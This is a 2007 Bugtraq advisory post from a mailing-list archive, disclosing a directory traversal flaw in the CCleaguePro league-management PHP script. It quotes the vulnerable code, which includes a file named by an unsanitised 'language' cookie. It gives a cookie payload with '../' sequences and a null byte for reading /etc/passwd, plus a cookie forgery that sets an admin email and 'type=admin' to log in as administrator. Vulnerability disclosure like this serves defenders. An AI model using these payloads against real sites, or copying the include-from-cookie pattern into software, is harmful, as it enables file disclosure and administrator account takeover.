lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20070319151353.31279.qmail@securityfocus.com>
Date: 19 Mar 2007 15:13:53 -0000
From: snakeapollon@...oo.com
To: bugtraq@...urityfocus.com
Subject: CCleaguePro_V1.0.1RC1 Directory Traversal Vulnerability

CCleaguePro_V1.0.1RC1 Directory Traversal Vulnerability
==============================================================
CCleaguePro
Version: 1.0.1 RC1
Website URL:http://www.castillocentral.com/
==============================================================
Discoved by Snake 
[Unkn0wn Security Researcher]
The original article can be found at: http://unkn0wn.awardspace.com/
==============================================================
[XIII Security ResearcherZ]
Gr33tZ t0 :l0pht.blackhat,Kouros,Sasan, All Iranian Hackerz
==============================================================
Vulnerable code is in index.php & some 0ther pageZ
in line 27-35 :

---------------cut here --------------->

  if($_COOKIE["language"]) {

        $llang = $_COOKIE["language"];
} 
else 
{
	
$l_array = explode("-",$lang_array[0]);
	$llang = $l_array[0];

        setcookie("language",$llang,time()+1209600,"","","");

}


include("lang/".$llang.".php");
---------------cut here ---------------<

==============================================================
Ex:
open cookies and find portal cookies,chang this in first line(use opera for changing,is too easy whit opera!==>tools==>advance==>cookies):
---------------cut here --------------->
language

en
to
language

../../../../../../../../../etc/passwd%00
---------------cut here ---------------<

in you found admin's email for login can chang cookeis some thing like this:

>---------------cut here ---------------
u

snake%40lolo.com


type

admin
---------------cut here ---------------<

and login Admin!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ